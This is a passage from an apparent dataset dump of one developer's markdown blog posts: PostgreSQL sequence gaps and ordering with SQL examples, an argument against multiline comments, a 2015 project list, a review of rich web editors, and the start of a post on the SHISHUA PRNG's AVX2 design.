The highest isolation level PostgreSQL offers is **Serializable** isolation: all\ntransactions are causally ordered, from `BEGIN` to `COMMIT`. Of course,\ntransactions still execute in parallel; but the database makes sure that\neverything a transaction witnesses can be explained by executing all its\nstatements either after all statements of another transaction, or before all of\nthem. It won’t see a changing state within the execution of the transaction.\n\n_(By the way, PostgreSQL only achieved serializability in 2011, when they\nreleased [version 9.1][] with support for predicate locks. It is hard.)_\n\n[version 9.1]: https://www.postgresql.org/docs/release/9.1.0/\n\nHaving a causal order does not mean that this order follows _real time_: one\ninsertion may complete at 9:30am _after (in causal order)_ another that\ncompletes later at 10:40am. If you want the additional property that the order\nis consistent with wall clock time, you want **[Strict Serializability][]**.\n\n[Strict Serializability]: https://jepsen.io/consistency/models/strict-serializable\n\nHowever, **PostgreSQL makes no claim of Strict Serializability**.\n\nGiven all this, sequences probably feel much weaker than you initially thought.\n\nYou want them to give a continuous set of numbers, but a sequence can yield\nvalues with gaps (1 2 4).\n\nYou want them to give a causal order _(2 was inserted before 3)_, but it can\nyield values out of order (1 3 2).\n\nAll a sequence promises is to give values that have an order. Not a continuous\norder, nor a time order.\n\nLet’s demonstrate both.\n\n## Gaps\n\nLet’s create a table with a `SERIAL` identifier. For the purpose of showing\nthings going right, let’s insert a row.\n\n```sql\nCREATE TABLE gaps (id SERIAL);\nBEGIN;\nINSERT INTO gaps DEFAULT VALUES;\nCOMMIT;\nSELECT * FROM gaps;\n```\n\n     id \n    ----\n      1\n    (1 row)\n\nNow comes the gap.\n\n```sql\nBEGIN;\nINSERT INTO gaps DEFAULT VALUES;\nROLLBACK;\n```\n\nSince we rolled back, nothing happened – or did it?\n\nLet’s now insert another row.\n\n```sql\nINSERT INTO gaps DEFAULT VALUES;\nSELECT * FROM gaps;\n```\n\n     id \n    ----\n      1\n      3\n    (2 rows)\n\nOops! Despite the rollback, the sequence was incremented without being reverted.\nNow, there is a gap.\n\nThis is not a PostgreSQL bug per se: the way sequences are stored, PostgreSQL\njust does not keep the information necessary to undo the `nextval()` without\npotentially breaking other operations.\n\nLet’s now break the other assumption.\n\n## Order violation\n\nFirst, a table with a sequence and a timestamp:\n\n```sql\nCREATE TABLE orders (id SERIAL, created_at TIMESTAMPTZ);\n```\n\nLet’s set up two concurrent connections to the database. Each will run the same\ninstructions. I started the first one yesterday:\n\n```sql\n-- Connection 1\nBEGIN;\n```\n\nI launch the second one today:\n\n```sql\n-- Connection 2\nBEGIN;\nINSERT INTO orders (created_at) VALUES (NOW());\nCOMMIT;\n```\n\nLet’s go back to the first one:\n\n```sql\n-- Connection 1\nINSERT INTO orders (created_at) VALUES (NOW());\nCOMMIT;\n```\n\nSimple enough. 
But we actually just got the order violation:\n\n```sql\nSELECT * FROM orders ORDER BY created_at;\n```\n\n     id |          created_at           \n    ----+-------------------------------\n      2 | 2019-09-04 21:10:38.392352+02\n      1 | 2019-09-05 08:19:34.423947+02\n\nThe order of the sequence does not follow creation order.\n\nFrom then on, developers may write some queries ordering by ID, and some\nordering by timestamp, expecting an identical order. That incorrect assumption\nmay break their business logic.\n\nLest you turn your heart to another false god, that behavior remains the same\nwith serializable transactions.\n\n## Are we doomed?\n\nNo.\n\nSure, the systems we use have weak assumptions. But that is true at every level.\nThe nice thing about the world is that you can combine weak things to make\nstrong things. Pure iron is ductile, and carbon is brittle, but their alloy is\nsteel.\n\nFor instance, you can get the best of both worlds, causal order and “wall clock”\ntimestamps, by having a `TIMESTAMPTZ` field, only inserting rows within\nserializable transactions, and setting the `created_at` field to now, or right\nafter the latest insertion:\n\n```sql\nBEGIN ISOLATION LEVEL SERIALIZABLE;\nINSERT INTO orders (created_at)\nSELECT GREATEST(NOW(), MAX(created_at) + INTERVAL '1 microsecond') FROM orders;\nCOMMIT;\n```\n\nIndeed, PostgreSQL’s `TIMESTAMPTZ` has microsecond precision. You don’t want\nconflicts in your `created_at` (otherwise you could not determine causal order\nbetween the conflicting rows), so you add a microsecond to the latest timestamp\nwhenever the clock has not yet moved past it.\n\nHowever, here, concurrent operations are likely to fail, as we acquire a\n(non-blocking) SIReadLock on the whole table (what the documentation calls a\nrelation lock):\n\n```sql\nSELECT l.mode, l.relation::regclass, l.page, l.tuple, substring(a.query from 0 for 19)\nFROM pg_stat_activity a JOIN pg_locks l ON l.pid = a.pid\nWHERE l.relation::regclass::text LIKE 'orders%'\n  AND datname = current_database()\n  AND granted\nORDER BY a.query_start;\n```\n\n           mode       | relation | page | tuple |     substring      \n    ------------------+----------+------+-------+--------------------\n     SIReadLock       | orders   |      |       | INSERT INTO orders\n     RowExclusiveLock | orders   |      |       | INSERT INTO orders\n     AccessShareLock  | orders   |      |       | INSERT INTO orders\n\nThe reason for that is that we perform a slow Seq Scan in this trivial example,\nas [EXPLAIN][] shows:\n\n                                   QUERY PLAN\n    -------------------------------------------------------------------------------\n     Insert on orders  (cost=38.25..38.28 rows=1 width=8)\n       ->  Aggregate  (cost=38.25..38.27 rows=1 width=8)\n             ->  Seq Scan on orders orders_1  (cost=0.00..32.60 rows=2260 width=8)\n\n[EXPLAIN]: https://www.postgresql.org/docs/current/using-explain.html\n\nWith an [index][], concurrent operations are much more likely to work:\n\n[index]: https://www.postgresql.org/docs/current/sql-createindex.html\n\n```sql\nCREATE INDEX created_at_idx ON orders (created_at);\n```\n\nWe then only take a tuple lock on the table:\n\n           mode       | relation | page | tuple |     substring      \n    ------------------+----------+------+-------+--------------------\n     SIReadLock       | orders   |    0 |     5 | INSERT INTO orders\n     RowExclusiveLock | orders   |      |       | INSERT INTO orders\n     AccessShareLock  | orders   |      |       | INSERT INTO orders\n\nHowever, the tuple in question is the latest row in the table. Any two\nconcurrent insertions will definitely read from the same one: the one with the\nlatest `created_at`. Therefore, only one of the concurrent insertions will\nsucceed; the others will need to be retried until they succeed too.\n\n
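Concretely, a failed attempt looks like this (whether the error surfaces on the\n`INSERT` or on the `COMMIT` depends on timing):\n\n```sql\n-- Connection 1\nBEGIN ISOLATION LEVEL SERIALIZABLE;\nINSERT INTO orders (created_at)\nSELECT GREATEST(NOW(), MAX(created_at) + INTERVAL '1 microsecond') FROM orders;\n\n-- Connection 2, overlapping with connection 1\nBEGIN ISOLATION LEVEL SERIALIZABLE;\nINSERT INTO orders (created_at)\nSELECT GREATEST(NOW(), MAX(created_at) + INTERVAL '1 microsecond') FROM orders;\nCOMMIT;\n\n-- Connection 1\nCOMMIT;\n-- ERROR:  could not serialize access due to read/write dependencies among transactions\n-- HINT:  The transaction might succeed if retried.\n```\n\n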
## Subset Ordering\n\nIn cases where you only need a unique ordering for a subset of rows based on\nanother field, you can set up a combined index with that other field:\n\n```sql\nCREATE TABLE orders (\n  account_id UUID DEFAULT gen_random_uuid(),\n  created_at TIMESTAMPTZ);\nCREATE INDEX account_created_at_idx ON orders (account_id, created_at DESC);\n```\n\nThen the [query planner][EXPLAIN] goes through the account index:\n\n```sql\nINSERT INTO orders (account_id, created_at)\nSELECT account_id, GREATEST(NOW(), created_at + INTERVAL '1 microsecond')\nFROM orders WHERE account_id = '9c99bef6-a05a-48c4-bba3-6080a6ce4f2e'::uuid\nORDER BY created_at DESC LIMIT 1\n```\n\n                                   QUERY PLAN\n    -----------------------------------------------------------------------------------------------------------------------\n     Insert on orders  (cost=0.15..3.69 rows=1 width=24)\n       ->  Subquery Scan on \"*SELECT*\"  (cost=0.15..3.69 rows=1 width=24)\n             ->  Limit  (cost=0.15..3.68 rows=1 width=32)\n                   ->  Index Only Scan using account_created_at_idx on orders orders_1  (cost=0.15..28.35 rows=8 width=32)\n                         Index Cond: (account_id = '9c99bef6-a05a-48c4-bba3-6080a6ce4f2e'::uuid)\n\nAnd concurrent insertions on different accounts work:\n\n           mode       | relation | page | tuple |     substring      \n    ------------------+----------+------+-------+--------------------\n     SIReadLock       | orders   |    0 |     1 | INSERT INTO orders\n     RowExclusiveLock | orders   |      |       | INSERT INTO orders\n     AccessShareLock  | orders   |      |       | INSERT INTO orders\n     SIReadLock       | orders   |    0 |     2 | COMMIT;\n\n(The first three rows are from one unfinished transaction on account 1; the\nlast is from a committed one on account 2.)\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n  \"@type\": \"BlogPosting\",\n  \"datePublished\": \"2019-09-05T17:28:59Z\",\n  \"keywords\": \"sql\" }\n</script>\n"
},
{
"alpha_fraction": 0.7636743187904358,
"alphanum_fraction": 0.7707724571228027,
"avg_line_length": 65.52777862548828,
"blob_id": "b4a4e8875794862bf1ba09a782ec9c881a5c323c",
"content_id": "d312cf03fd104f80eee10debff652bb144013a8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2395,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 36,
"path": "/blog/src/multiline-comments-do-without.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Multiline comments: do without\n\nLately, while working on my [autocompletion system](https://github.com/espadrine/aulx), I kept struggling with multiline comments.\nObviously, you don't want dot completion in a comment.\nThen, I started wondering about how useful multiline comments are, at all.\n\nThere are three use-cases for multiline comments.\n\n1. Normal comments,\n2. Comment a block of code effortlessly,\n3. Automated documentation (JavaDoc, JSDoc, etc.)\n\nThe point that I wish to make is that none of those make multiline comments relevant. Some even have inherent deficiencies and edge-cases.\n\nNormal comments can always be managed by single-line comments.\nIt seems that you can always convert your multiline comments into single-line comments with no trouble at all. The reverse operation, converting single-line comments to multiline, is not always possible.\n\nCommenting a block of code can also be handled by single-line comments. If it isn't just as effortless as using multiline comments, your text editor is lacking. It is hugely easy on Vi and Emacs, and on any good text editor.\n\n- Vi: in visual mode, select the lines you want to comment. Press the colon key, and type the following command: `s,^,//,`. That command replaces the start of the line with a double slash.\n- Emacs: select the lines you want to comment. Enter CTRL+X, R, T (in this order). At the prompt that appears, enter `//`. Double slashes appear at the start of each line.\n\nWorse than that, multiline comments can fail. If the block of code contains a string, or a regex, that includes the closing sequence of characters (for instance, \"*/\"), then the comment stops there. You have no recourse. Furthermore, in most programming languages, multiline comments don't even nest: if your block of code has one, you can't comment it.\n\nFinally, documentation. I see no reason why automatic documentation tools cannot deal with single-line comments. Furthermore, the mere idea that you are not allowed to write \"*/\" in your documentation is preposterous.\n\nIf you create a new language, please remember: adding multiline comments is a mistake.\n\nIf you use a language with multiline comments that rely on a closing sequence, avoid them like a disease.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-02-04T20:22:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7271062135696411,
"alphanum_fraction": 0.7594627737998962,
"avg_line_length": 62,
"blob_id": "0d97d1b05ac897b82180692d75aa754af9891a49",
"content_id": "37a9ebe6cc5d5e9632171a41eb66d62660240e42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1638,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 26,
"path": "/blog/src/what-i-did-in-2015.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Did In 2015\n\n- [Passphrase][], a program to generate [good passphrases][]. Providing the entropy gives intuition into how strong they are, and provides an incentive to learn more.\n- [Email-Login][], a library for passwordless authentication.\n- [Canop][], a synchronization library. It allows collaborative text editing, and will allow offline and history capabilities. While it works with text, I will make it generalize to a JSON data structure, maintained consistent with a centralized server through websockets.\n- [RegList][], a library to compile a list of regexes into a single, fast, regex, while keeping the match groups information. It turns out to not provide the expected speedup, which I hope to dig into in the future.\n\nI did a lot of experimentation in 2015. Many failed projects. I also started a few as-of-yet secret projects which I hope will achieve greatness.\n\nOne of my failings, however, is how little I explain and advertize my projects. Given that 2015 was a year of experimentation, it is not very surprising. 2016 will need to be a year of development, and 2017 a year of marketing.\n\n[Previously][].\n\n[Passphrase]: https://github.com/espadrine/passphrase\n[good passphrases]: https://xkcd.com/936/\n[Email-Login]: https://github.com/espadrine/email-login\n[Canop]: https://github.com/espadrine/canop\n[RegList]: https://github.com/espadrine/reglist\n[Previously]: http://espadrine.tumblr.com/post/106997844921/what-i-made-on-year-2014\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-01-28T20:20:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7347863912582397,
"alphanum_fraction": 0.7384548783302307,
"avg_line_length": 55.16969680786133,
"blob_id": "fabca9db61eda1394c6fc396476e2033cb9c3c54",
"content_id": "621a606ce4c222237728dd33c3838ce2f3a3283c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9328,
"license_type": "no_license",
"max_line_length": 640,
"num_lines": 165,
"path": "/blog/src/rich-web-editors.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Rich Web Editors\n\nHere is what I wish to see in a rich Web editor.\n\n## Features\n\nFirst, **formatting**. At this point, I feel we all agree that there are two major types of formatting currently in use: block and inline. Here are all the corresponding formatting options a light editor should offer, by order of importance.\n\n* Block\n * Paragraph\n * Six heading levels\n * Lists (ordered and unordered, with nesting)\n * Embedded resource (image, audio, video, iframe?)\n * Blockquote\n * Horizontal ruler\n * Code block (optional: could be implemented as a paragraph with code and line breaks)\n* Inline\n * Italic\n * Bold\n * Link\n * Code\n * Line break\n * Strikethrough\n\nSecond, **toolbars** are the bane of my existence. User interfaces should be as clean as they can afford to be. All I should see when editing text is the text I write and a discreet button on the side to click when I am done editing.\n\nThe **editor** should not be a tiny window surrounded by bells and whistles. Ideally, all you should see is your text. If you are editing markup, you should see a live rendering of what you are typing on the side, centered on the equivalent location that your cursor is at.\n\nMost importantly, editing is a **linear process**. It must be possible to specify what we want to write in the order in which we think it. For instance, if I know that the next word is italic, I ought to set italic _before_ I actually write the word. Being forced to first type text, then format it, requires me to keep in mind all the formatting I want as I write, in order to enforce it later. Writing already demands that I strain my memory into preparing what I will write later; no need to strain it further. This is what most makes me enjoy Markdown editing: typing a star, for example, naturally occurs before typing the italic word.\n\nFinally, **performance**: there should never be a moment when we can type faster than text appears on the screen.\n\nNice-to-haves:\n\n1. Automatic conversion of text to the right codepoint (such as quotes `\"` to `“` and `--` to `—`), although you ought to be able to undo that.\n2. Choosing the flow of blocks, between:\n * Normal\n * Centered\n * Half-width; text flows on the right\n * Half-width; text flows on the left\n3. Tables, as a new block type.\n4. Checklist, as a new block type (which Slack provides).\n\n## Solutions\n\nFormatting options should only appear in **contextual modeless popup**. That means it should not force you out of your editing experience. Typing should dismiss the popup. In total, all we need are three distinct popups:\n\n1. Inline formatting\n2. Block formatting\n3. Embedding\n\nWhile editing, there is no need for any popup. **When selecting text**, that popup has three purposes: contextually indicate that you can format that text inline, provide buttons to do so, and hint at the ability to do so in linear editing by providing the shortcuts.\n\n* `Ctrl+I` → Italic\n* `Ctrl+B` → Bold\n* `Ctrl+K` → Link (Medium, Tumblr, Slack, Google Docs, Word)\n* `Ctrl+Shift+K` → Code (Slack)\n* `Shift+Enter` → Line break\n* `Ctrl+Shift+X` → Strikethrough (Slack)\n* `Alt+Shift+5` → Strikethrough (Google Docs)\n* `Ctrl+Shift+6` → Strikethrough (Tumblr)\n\n**When creating a new block**, a different popup should appear, giving you the option to select the block type (along with hinting at keyboard shortcuts). By default, a block should be a paragraph.\n\nChanging the type of an existing block is obvious in hindsight. 
We are used to double-click to select a word, and to triple-click to select a block. Just like the double-click, the **triple-click** should also show the block formatting popup.\n\n(I thought I was the only one to figure that idea out. To some extent, I am. Medium does rely on triple-click to hide one button: the drop cap.)\n\nUnlike the inline formatting popup, the block one features exclusive options. We can therefore omit the current one, reducing the number of buttons.\n\nSimilarly, when embedding a resource, the resource type can be inferred from the link, which avoids unnecessarily asking what its type is. In fact, a resource embedding-specific popup can appear **whenever we paste a URL**, suggesting either to produce a link, or to embed its target. Ideally, pasting or dropping documents from the desktop should also be supported, and that does not require a popup, as the type can be inferred.\n\nBecause the block popup appears upon creating a new block, it is not as critical to having a linear editing process. Shortcuts are therefore optional. However, the following can ease the most common operations.\n\n* `Ctrl+Alt+0` → Paragraph (Google Docs)\n* `Ctrl+Alt+1` to `6` → Heading (Google Docs, Word, ~Medium, ~Slack)\n* `Ctrl+Shift+2` → Heading (Tumblr)\n* `Ctrl+Shift+7` → Ordered list (Google Docs, Slack, Tumblr)\n* `Ctrl+Shift+8` → Unordered list (Google Docs, Slack, Tumblr)\n* `Tab`, `Shift+Tab` → Increase / decrease nesting in lists\n* `Ctrl+]`, `Ctrl+[` → Same as above (when Tab needs to be used)\n* `Ctrl+Shift+9` → Blockquote (Tumblr)\n* `Ctrl+Alt+K` → Code block (Slack)\n* `Ctrl+R` → Horizontal ruler (Stack Overflow)\n\nHowever, a much greater idea in my opinion is to have **Markdown-like automatic conversion**. It is not a novel idea (Slack did it first, and ProseMirror followed suit).\n\n* `#+Space` → Heading (the number of # determines the header level)\n* `*+Space`, `-+Space` → Unordered list\n* `1.+Space` → Ordered list\n* `>+Space` → Blockquote\n* ```` ```+Space ```` → Code block\n* `----` → Horizontal ruler\n* `![]` → Embedded resource (not part of Slack, but would it not be fancy?)\n* `:emoji:` → Emoji (based on the name). 
A nice-to-have, most certainly.\n\nGeneral shortcuts that ought to be supported as well:\n\n* `Ctrl+C`, `Ctrl+X`, `Ctrl+V`: copy, cut, paste\n* `Ctrl+Z`, `Ctrl+Shift+Z`, `Ctrl+Y`: undo, redo\n* `Ctrl+Backspace`: delete previous word\n* `Ctrl+Delete`: delete next word\n* `Ctrl+Home`, `Ctrl+End`: go to the start / end of the whole document\n* `Ctrl+F`, `Ctrl+G`: find, find next occurrence\n* `Ctrl+S`: if there is no auto-saving, this should save the document\n* `Ctrl+/`: show shortcuts (Medium, Slack)\n\n## What I have used\n\nI will only point out what is wrong or missed in each implementation.\n\n* [Blogger][]\n * Ugly toolbar\n * Too many formatting options: inline background color for text, inline font change, font size and text justification!\n* [Wikipedia][]\n * Ugly toolbar\n * Not WYSIWYG, with an impenetrable syntax\n * No live preview\n* [Reddit][]\n * Not WYSIWYG, and a custom Markdown that is not CommonMark\n * No live preview\n * Only images can be embedded\n* [Stack Overflow][]\n * Ugly toolbar\n * Only images can be embedded\n* [Tumblr][]\n * The editor is a tiny window in the middle of the screen, with the full app (updating blogs) running in the background — and you can see it by transparency!\n * Single-level heading\n * Illogical separation between block and inline formatting (the block formatter doesn't include block quotes or headings: those are in the inline formatter)\n * Automatic conversion of quotes, but no way to undo that conversion.\n * Audio cannot be embedded\n * Markdown mode: Should use CommonMark (ideally with tables added)\n * Markdown mode: No selection of formatting options appear when selecting text\n * Markdown mode: Only images can be embedded\n * Markdown mode: Only 1-level nesting (guess how I learned that?)\n* [Slack][]\n * Slow and Buggy: on Firefox at least, the cursor frequently breaks, appears at two places, …\n * 3-level heading\n* [Medium][]\n * 3-level heading\n * Illogical separation between block and inline formatting (the block formatter doesn't include block quotes or headings: those are in the inline formatter)\n * Automatic conversion of quotes, but no way to undo that conversion\n * Audio cannot be embedded\n\nI'd rather not include [ProseMirror][] here yet, as it is a beta product. It fares fairly well, although I'd rather not have inline formatting options in the block formatting options (they are present to be used for linear editing (switch to italic before writing the italic word), but the keyboard shortcut is not hinted at). Besides, the always-present hamburger icon used for block formatting could be thrown away. Finally, nested lists are very awkward at the moment (neither tab nor `Ctrl+]` works, for instance).\n\nThe biggest issue facing ProseMirror, however, is the fact that *it does not have a block-level resource embedding object*. Images are only inline. It is convenient to enable emojis, I suppose, but definitely not for most publications. Most images in rich text are a block element, usually centered, sometimes with text flowing on the left or on the right. 
Almost never is having text aligned with the bottom of the image desirable.\n\n[Blogger]: https://www.blogger.com\n[Wikipedia]: https://www.wikipedia.org/\n[Reddit]: https://www.reddit.com/\n[Stack Overflow]: https://stackoverflow.com/\n[Tumblr]: https://www.tumblr.com/\n[Slack]: https://slack.com/\n[Medium]: https://medium.com/\n[ProseMirror]: http://prosemirror.net/\n\nWhat other improvements would you like to see in user experience?\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-09-26T19:42:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7094212174415588,
"alphanum_fraction": 0.7437824606895447,
"avg_line_length": 38.59202575683594,
"blob_id": "fec18b2d09d6b4b8b374111de38756fba4edf954",
"content_id": "b463c31dd0f49c17d048826f4914e91d53a8fcd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 25972,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 652,
"path": "/blog/src/shishua-the-fastest-prng-in-the-world.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# SHISHUA: The Fastest Pseudo-Random Generator In the World\n\n_(TLDR: see the [benchmark](#benchmark) and the [code].)_\n\nSix months ago, I wanted to make the best PRNG with an unconventional design,\nwhatever that design may be.\nI expected it to start easy, and slowly get harder;\nI wondered whether I would learn fast enough to pass the highest bar.\n\nSurprisingly, difficulty did not increase linearly.\nPassing the bytewise Chi-Squared tests was very hard!\n\nThen, when I got the concepts, passing dieharder was also very hard.\nWhen I got to that point, I was honestly so extatic,\nthat [I published what I got][permal-twitter] to learn what the next challenge needed to be.\nBut it turned out [it failed PractRand][permal-fail].\n\nThen, [passing BigCrush][harmonoise-twitter] was very hard.\n\nThen, passing 32 tebibytes of PractRand was very hard.\n\nBut once I reached that point, I realized that speed was going to be an issue.\nIt wasn’t just about having a construction that emitted ten megabytes a second, taking a month to pass PractRand.\n\nBut I have to admit, [passing PractRand at a gigabyte a second][combit] was very hard.\n\nOnce you get there… what you really want to see is whether you can reach the Pareto frontier.\n\nYou want the fastest PRNG in the world that beats the hardest statistical tests.\n\nI got there.\n\nIn [the previous entry to the series][a primer on randomness], I explained all the things I learnt to reach it.\nHere, I’ll detail how the winning design works.\n\n[permal-twitter]: https://mobile.twitter.com/espadrine/status/1184542865969614849\n[permal-fail]: https://mobile.twitter.com/espadrine/status/1184883565634424832\n[harmonoise-twitter]: https://mobile.twitter.com/espadrine/status/1186358084425400320\n[combit]: https://github.com/espadrine/combit\n[a primer on randomness]: https://espadrine.github.io/blog/posts/a-primer-on-randomness.html\n[code]: https://github.com/espadrine/shishua\n\n## Target\n\nLet’s start with the obvious: **speed is platform-dependent**.\nI focused my optimization on the modern x86-64 architecture (so, Intel and AMD chips).\n\nThe classic metric used to compare performance there is **cpb**:\nthe number of CPU cycles spent to generate a byte of output.\nAll cryptographic papers [compute and compare that metric][SUPERCOP].\nA slightly lower cpb, in software or hardware, can weigh in the balance\njust enough to make a primitive win a competition,\nor become widely used by the major websites of the world.\n\n[SUPERCOP]: https://bench.cr.yp.to/supercop.html\n\nTo improve your cpb, you can do three things:\n\n1. Generate more bytes for the same amount of work, or\n2. Do less work to generate the same amount of bytes, or\n3. 
Parallelize work.\n\nWe will do all of the above.\n\nTherefore, starting with point 1, we need to output more bits on each iteration.\n\nI am worried that people might say,\n“this is not a PRNG unless it outputs 32-bit numbers,” or “64-bit numbers”.\nOr more generally, “PRNGs must only rely on this subset of x86-64”;\nas if some instructions, such as `POPCNT`, or some registers, such as `%xmm7`, were off-limits.\n\nBut PRNGs are engineering: they try to make the best of the CPU, decade after decade!\nThey relied on `ROL` when it came, and on `%rax` when 64-bit CPUs landed.\nSure, it means that this algorithm might be slower on ARM (although that remains to be seen);\nbut 64-bit PRNGs were heavily used before 2019, when Android switched to requiring 64-bit support!\n\nSo things evolve with the hardware.\nAnd today, Intel and AMD CPUs support 256-bit operations through [AVX2].\n\n[AVX2]: https://software.intel.com/en-us/articles/how-intel-avx2-improves-performance-on-server-applications\n[`__uint128_t`]: https://gcc.gnu.org/onlinedocs/gcc/_005f_005fint128.html\n[HWD]: http://xoshiro.di.unimi.it/hwd.c\n[my own benchmark program]: https://github.com/espadrine/shishua/blob/master/prng.c\n\nJust like RC4 outputs 1 byte, and drand48 can only output 4 at a time;\njust like pcg64 can only output 8 at a time;\nwe will output 32 bytes at a time.\n\nObviously, while 8 bytes could be output as a 64-bit number,\nwhich most programming languages have a built-in type for,\nfew have a type for 16 bytes (C’s [`__uint128_t`] being a notable exception);\nfewer yet have one for 32 bytes (aside from intrinsics).\n\nSo we must say goodbye to the typical PRNG function prototype\n(here taken from Vigna’s [HWD] benchmark program):\n\n    static uint64_t next(void);\n\nInstead, we can have the generator take a buffer to fill\n(here taken from [my own benchmark program]):\n\n    void prng_gen(prng_state *s, __uint64_t buf[], __uint64_t size);\n\nAre there disadvantages?\n\nWell, if your generator outputs 32 bytes at a time,\nyou need the consumer to give an array that is a multiple of 32 bytes;\nideally, an array aligned to 32 bytes.\n\nAlthough, with a tiny bit more work, you don’t.\nJust fill a buffer. Output from it what has not been consumed;\nrefill it as needed.\n\nThat does make *latency* unpredictable: some calls will only read the buffer.\nBut it averages out the same.\n\n
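As a sketch of that buffering approach (this is not from SHISHUA’s code; it assumes the `prng_state` and `prng_gen` declared above):\n\n```c\n// Hypothetical wrapper: hand out 8 bytes at a time from a cached block,\n// refilling it with one bulk prng_gen call whenever it runs dry.\ntypedef struct {\n  prng_state state;\n  __uint64_t buf[16];  // 128 bytes: a multiple of the 32-byte output block\n  int cursor;          // next unread index; start it at 16 to force a fill\n} buffered_prng;\n\n__uint64_t buffered_next(buffered_prng *b) {\n  if (b->cursor == 16) {\n    prng_gen(&b->state, b->buf, 16);\n    b->cursor = 0;\n  }\n  return b->buf[b->cursor++];\n}\n```\n\n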
So now we generate more bytes for the same amount of work.\nNext step: how do we parallelize work?\n\n## Parallelism\n\nThe CPU offers an incredible wealth of parallelism at every level.\n\nFirst, of course, are the SIMD instructions (Single-Instruction, Multiple Data).\nFor instance, AVX2 does four 64-bit additions in parallel, or eight 32-bit ones, etc.\n\nIn cryptography, it has been severely relied upon for fifteen years.\nNotably, [ChaCha20] gains an incredible amount of speed from it;\nmost important primitives that don’t use AESNI rely on it.\nFor instance, [NORX] and [Gimli] are designed with that in mind.\n\n[ChaCha20]: https://github.com/floodyberry/supercop/tree/master/crypto_stream/chacha20/dolbeau/amd64-avx2\n[NORX]: https://norx.io/data/norx.pdf\n[Gimli]: https://cryptojedi.org/papers/gimli-20170627.pdf\n\nRecently, there has been increasing interest in the non-cryptographic PRNG community.\n\nIn particular, existing primitives not designed for SIMD can be the basis\nfor building a very fast PRNG.\n\nFor instance, Sebastiano Vigna, while pushing for his [xoshiro256++] design\nin the Julia programming language’s standard library,\n[learnt][Julia] that concatenating the output of eight concurrent instances of the PRNG,\ninitialized differently, was made very fast by having each operation of the design\nperformed simultaneously on each PRNG.\n\n[xoshiro256++]: http://prng.di.unimi.it/#speed\n[Julia]: https://github.com/JuliaLang/julia/issues/27614#issuecomment-548154730\n\nSIMD is one level of CPU parallelism, but not the only one.\nI encourage you to read [the previous article on the subject][a primer on randomness]\nto get a better picture, but I’ll mention what I relied upon.\n\n**CPU pipelining** processes multiple instructions at different stages of processing.\nWhen well-ordered to limit interstage dependencies, instructions can be processed faster.\n\n**Superscalar execution** makes the computation part of instructions happen in parallel.\nBut they must have no read/write dependencies to do so.\nWe can fit the design to reduce the risk of stalls,\nby making the write part happen long before the read.\n\n**Out-of-order execution** lets the processor execute instructions that happen later,\neven though a previous instruction is not yet done, if the later instruction has no\nread/write dependency on it.\n\nAll right, let’s dig our hands into the implementation!\n\n## Design\n\nLet’s walk through the design of something we will call SHISHUA-half,\nfor reasons that will become obvious as the article unfolds.\n\nIt looks like this:\n\n\n\nLet’s dive in line by line.\n\n```c\ntypedef struct prng_state {\n  __m256i state[2];\n  __m256i output;\n  __m256i counter;\n} prng_state;\n```\n\nOur state is cut in two pieces that both fit in an AVX2 register (256 bits).\nWe keep the output around in the state to gain a bit of speed,\nbut it is not actually part of the state.\n\nWe also have a 64-bit counter; it is also an AVX2 register to ease computation.\nIndeed, AVX2 has a bit of a quirk where regular registers (`%rax` and the like)\ncannot directly be transferred to the SIMD ones with a `MOV`;\nthe data must go through RAM (typically the stack), which costs both latency and\ntwo CPU instructions (`MOV` to the stack, `VMOV` from the stack).\n\nWe’re now going to look at generation.\nWe start by loading everything, then we 
loop over the buffer,\nfilling it up by 32 bytes at each iteration.\n\n```c\ninline void prng_gen(prng_state *s, __uint64_t buf[], __uint64_t size) {\n  __m256i s0 = s->state[0], counter = s->counter,\n          s1 = s->state[1], o = s->output;\n  for (__uint64_t i = 0; i < size; i += 4) {\n    _mm256_storeu_si256((__m256i*)&buf[i], o);\n    // …\n  }\n  s->state[0] = s0; s->counter = counter;\n  s->state[1] = s1; s->output = o;\n}\n```\n\nSince the function is inlined, the buffer being immediately filled at the start\nlets the CPU execute the instructions that depend on it in the calling function right away,\nthrough out-of-order execution.\n\nInside the loop, we perform three operations on the state in rapid succession:\n\n1. **SHI**ft\n2. **SHU**ffle\n3. **A**dd\n\nHence the name, SHISHUA!\n\n### First, the shift\n\n```c\nu0 = _mm256_srli_epi64(s0, 1); u1 = _mm256_srli_epi64(s1, 3);\n```\n\nAVX2 does not support rotations, sadly.\nBut I want to entangle bits from one position in the 64-bit numbers\nwith other bit positions, and shift is the next best thing for that.\n\nWe must shift by an odd number so that each bit reaches all 64-bit positions,\nand not just half.\n\nShift loses bits, which removes information from our state.\nThat is bad, so we minimize the loss: the smallest odd numbers are 1 and 3.\nWe use different shift values to increase divergence between the two sides,\nwhich should help lower the similarity of their self-correlation.\n\nWe use rightward shifts because the rightmost bits have the least diffusion in addition:\nthe low bit of `A+B` is just a XOR of the low bits of `A` and `B`, for instance.\n\n### Second, the 